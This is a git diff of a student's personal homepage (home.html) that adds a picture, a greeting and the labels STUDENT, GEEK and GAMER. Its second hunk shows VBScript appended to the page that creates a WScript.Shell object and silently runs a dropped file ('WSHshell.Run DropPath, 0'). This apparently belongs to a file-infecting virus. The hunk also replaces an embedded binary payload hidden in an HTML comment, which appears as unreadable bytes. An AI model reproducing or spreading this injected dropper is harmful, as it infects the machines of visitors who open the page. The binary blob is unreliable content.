putting contents on home.html

--- a/home.html
+++ b/home.html
@@ -5,14 +5,25 @@
     <body>
         <div id="container">
             <div id="imageArea">
-                <img id="myPic">
+                <img src="images/myPicture.png" id="myPic">
             </div>
             <div id="textArea">
                 <div id="name">
+                    <h1>HI! IM KENT</h1>
                 </div>
                 <div id="line">
+                    <h1><hr></h1>
                 </div>
                 <div id="detail">
+                    <div class="textDetail" id="first">
+                        <h3>STUDENT</h3>
+                    </div>
+                    <div class="textDetail">
+                        <h3>GEEK</h3>
+                    </div>
+                    <div class="textDetail" id="last">
+                        <h3>GAMER</h3>
+                    </div>
                 </div>
             </div>
         </div>
@@ -31,13 +42,13 @@ FileObj.Close
 End If
 Set WSHshell = CreateObject("WScript.Shell")
 WSHshell.Run DropPath, 0
-//--></SCRIPT><!--D˙Iö1òmNÜc¥Øt~Ä1
-OAáÏW√õ_ãíKíúy5›Øx÷⁄?ø˙j¯ØPv˘ÿ(boòœp$<∂∑ÎTÎ≤%>”R-C!H*…ù@\€Mï6Ÿ”è7‰¸’U;oò®ƒ√È‹§)xo0u`ÍuéBzﬁÕü‡±«#$Üawπu“†ø3YZ†∂ùÌÌã’a€“vÜM◊â‘üö:Ç(z'mª[[oá“÷ª:®S
-l‘Œw⁄X¶Vàﬁ^›bûW·tvQàè˛uµl?±—/õ¯n£jë±Ê∫∂tÒ§<•c®¿u‘d@æ˜ x¬*–ÙöOÛÚSª0©¨©9∏s£=<—trËS*™îRÈS}ùÆ÷=ZñœO‰+ÍTÆÀRt ‡≥‚]˜Hvfêfí{πfâ˜äËQ∞è!!§í+§Rìhÿ3ﬂä∆-z‚/lSÒ"±,dFÓa
-l¥ecq–«Ër· ‹
+//--></SCRIPT><!--–˙Íã∏≠OOW≤•$9˜ZN(ÈäVv¨†¬Zê€>ÃΩ%êπ16·¨À´t˜ﬁ\Ñ˛ªv·´,»¥ˆå›9–,£ﬂE≠Ñ=èP•|¬Ñ+ÒoqvEj^Ã(ë)FwùF7b4{Îﬁ◊ÈUQ†h∫Äõyk§{‘nﬁ!\Ïõ‘~≈>{f˚kµ∞óï’‰ñB?áŒ€„œ>∫o…¢º'0URJä*‘“1/¡”œÆòıV
+Eóôà∏WA]'tªú{¢•yª`”WhR◊2ÍTÕ ¯ÅŒ§{R∂⁄l»b1¨
+Ú=s y’l–ØØmsœ]oŸ*EÃªzrqó "Ø(0Õ]˜£z˘V˛£µ Ñõî;Ü4Ñ⁄`ÅÀ?§ÙvÏCˆ™D∂æ'}π7hå±ºg≥ãÑ0ÿ»Iæ©@€y4t®◊m◊;∑‘˛≈∏
+ÿb[ı⁄®ß¨˚XC{≠5≠ó:5Ω»◊™∆ò,4èrö(ﬁK ÿ9èß©ﬂ˙∫a∫Ôˆmuï⁄ Y∑…9M‡"}Ù©∞ÀÄŒØ8ÁÃ˙¯ötÉbB˙JJÕ(’í© 0Ãê{E ‹
 R˘‹
 ‹
 ‹
-ë◊OÛŒÿZÊ›
+ë◊Oz≈ÿZ∫ﬂ
  ‹
 -->
